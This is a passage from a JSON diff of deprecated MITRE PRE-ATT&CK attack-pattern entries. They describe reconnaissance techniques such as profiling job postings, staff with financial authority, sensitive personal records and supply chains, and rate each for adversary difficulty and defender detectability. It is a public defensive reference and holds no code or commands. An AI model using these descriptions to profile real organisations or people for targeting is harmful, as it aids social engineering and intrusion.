"x_mitre_difficulty_for_adversary_explanation": "Publicly posted information by design. Providing too much detail in the job posting could aid the adversary in learning more about the target's environment and possible technical weaknesses/deficiencies.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1025", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1278).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1278", + "external_id": "T1278" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1055", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1267).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1267", + "external_id": "T1267" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1044", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0c0f075b-5d69-43f2-90df-d9ad18f44624", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify people of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1269).\n\nThe attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1269", + "external_id": "T1269" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Common defenses protecting against poor OPSEC practices are traditionally more policy-based in nature rather than technical. Policy-based mitigations are generally more difficult to enforce and track violations, making it more difficult that this technique can be detected by common defenses.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Specialty cases enable an adversary to use key words in order to search social media and identify personnel with poor OPSEC practices who may have access to specialized information which would make them a target of interest. In addition, the open nature of social media leads to a tendency among individuals to overshare, encouraging poor OPSEC and increasing the ease by which an adversary can identify interesting targets.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1046", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--762771c2-3675-4535-88e9-b1f891758974", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify personnel with an authority/privilege", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1271).\n\nPersonnel internally to a company may have non-electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1271", + "external_id": "T1271" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The layers of data required and potential gaps of information to map a specific person to an authority or privilege on a network requires access to resources that may not tip off a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an adversary to undergo an intensive research process. It is resource intensive or requires special data access. May be easier for certain specialty use cases.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1048", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c9fb4451-729d-4771-b205-52c1829f949c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify resources required to build capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1348).\n\nAs with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1348", + "external_id": "T1348" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Recruitment is, by its nature, either clandestine or off the record.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Like target organizations, adversary organizations are competing to identify and hire top technical talent. Training less technical staff is also a viable option.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1125", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--04e93ca1-8415-4a46-8549-73b7c84f8dc3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify security defensive capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1263).\n\nSecurity defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1263", + "external_id": "T1263" + }, + { + "source_name": "OSFingerprinting2014", + "description": "InfoSec Institute. (2014, June 19). What You Must Know About OS Fingerprinting. Retrieved March 1, 2017." + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Technically, the defender has the ability to detect. However, this is typically not performed as this type of traffic would likely not prompt the defender to take any actionable defense. In addition, this would require the defender to closely review their access logs for any suspicious activity (if the activity is even logged).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The adversary will have some insight into defenses based on dropped traffic or filtered responses. It is more difficult to pinpoint which defenses are implemented (e.g., [https://www.fireeye.com FireEye] WMPS, [https://www.hpe.com Hewlett Packard Enterprise] Tipping Point IPS).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1040", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7dae871c-effc-444b-9962-4b7efefe7d40", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify sensitive personnel information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1274).\n\nAn adversary may identify sensitive personnel information not typically posted on a social media site, such as address, marital status, financial history, and law enforcement infractions. This could be conducted by searching public records that are frequently available for free or at a low cost online. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1274", + "external_id": "T1274" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This type of information is useful to understand the individual and their ability to be blackmailed. Searching public records is easy and most information can be purchased for a low cost if the adversary really wants it.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1051", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1276).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit organizational relationships. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1276", + "external_id": "T1276" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process. May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1053", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1246).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1246", + "external_id": "T1246" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + }, + { + "source_name": "RSA-supply-chain", + "description": "RSA Research. (2017, February). KINGSLAYER \u2013 A SUPPLY CHAIN ATTACK. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, if not impossible to detect, because the adversary may collect this information from external sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Supply chain diversity of sourcing increases adversary difficulty with accurate mapping. Industry practice has moved towards agile sourcing.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1023", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1265).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1265", + "external_id": "T1265" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process to obtain the full picture. It is possible to obtain basic information/some aspects via OSINT. May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1042", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify technology usage patterns", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1264).\n\nTechnology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1264", + "external_id": "T1264" + }, + { + "source_name": "SANSRemoteAccess", + "description": "Jason Ragland. (2010, January 18). Remotely Accessing Sensitive Resources. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Physical observations, OSINT for remote access instructions, and other techniques are not detectable.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Determine if users work offsite, connect remotely, or other possibly less restricted/secured access techniques.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1041", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ad124f84-52d2-40e3-95dd-cfdd44eae6ef", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify vulnerabilities in third-party software libraries", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1389).\n\nMany applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1389", + "external_id": "T1389" + }, + { + "source_name": "Flexera News Vulnerabilities", + "description": "John Lipsey. (2015, March 25). 15,435 Vulnerabilities in Close to 4,000 Applications in 2014. Retrieved April 12, 2017." + }, + { + "source_name": "Android Security Review 2015", + "description": "Google. (2016, April). Android Security 2015 Year In Review. Retrieved April 12, 2017." + }, + { + "source_name": "Android Multidex RCE", + "description": "Ryan Welton. (2015, June 15). A Pattern for Remote Code Execution using Arbitrary File Writes and MultiDex Applications. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "Open source software has great appeal mostly due to the time savings and that it is free. However, using this code without assessing it's security is akin to blindly executing third party software. Companies often do not dedicate the time to appropriately detect and scan for vulnerabilities. The mainstream mobile application stores scan applications for some known vulnerabilities. For example, Google's Android Application Security Improvement Program identifies and alerts developers to vulnerabilities present in their applications from use of the Vungle, Apache Cordova, WebView SSL, GnuTLS, and Vitamio third-party libraries. However, these scans are not likely to cover all vulnerable libraries, developers may not always act on the results, and the results may not be made available to impacted end users of the applications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Developers commonly use open source libraries such that where an adversary can easily discover known vulnerabilities and create exploits. It is also generally easy to decompile arbitrary mobile applications to determine what libraries they use, and similarly use this information to correlate against known CVEs and exploit packages.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1166", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify web defensive services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1256).\n\nAn adversary can attempt to identify web defensive services as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1256", + "external_id": "T1256" + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Active service detection may trigger an alert. Passive service enumeration is not detected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary can passively detect services (e.g., [https://www.cloudflare.com/ CloudFlare] routing) or actively detect services (e.g., by purposefully tripping security defenses)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1033", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--73e394e5-3d8a-40d1-ab8c-a1b4ea9db424", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Install and configure hardware, network, and systems", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1336).\n\nAn adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1336", + "external_id": "T1336" + }, + { + "source_name": "KasperskyRedOctober", + "description": "Kaspersky Labs. (2013, January 14). Kaspersky Lab Identifies Operation \u201cRed October,\u201d an Advanced Cyber-Espionage Campaign Targeting Diplomatic and Government Institutions Worldwide. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Skills are common to majority of computer scientists and \"hackers\". Can be easily obtained through contracting if not organic to adversary's organization.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1113", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Leverage compromised 3rd party resources", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThe utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1375", + "url": "https://attack.mitre.org/techniques/T1375" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:21:59.520Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1152", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Conducting technique requires either nation-state level capabilities or large amounts of financing to coordinate multiple 3rd party resources to gain desired insight.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect, it requires a broader vantage point than is typical that provides increased insight and conducts extensive data analysis and correlation between events.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--cdfdb0cd-a839-403c-9dd6-8a85d8c5c73d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Map network topology", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1252).\n\nA network topology is the arrangement of the various elements of a network (e.g., servers, workstations, printers, routers, firewalls, etc.). Mapping a network allows an adversary to understand how the elements are connected or related. (Citation: man traceroute) (Citation: Shodan Tutorial)", + "external_references": [ + { + "external_id": "T1252", + "url": "https://attack.mitre.org/techniques/T1252", + "source_name": "mitre-pre-attack" + }, + { + "description": "Linux Man Page. (n.d.). traceroute(8) - Linux man page. Retrieved April 2, 2017.", + "source_name": "man traceroute" + }, + { + "description": "A Shodan Tutorial and Primer Daniel Miessler. (n.d.). A Shodan Tutorial and Primer. Retrieved April 2, 2017.", + "source_name": "Shodan Tutorial" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "technical-information-gathering", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1029", + "x_mitre_version": 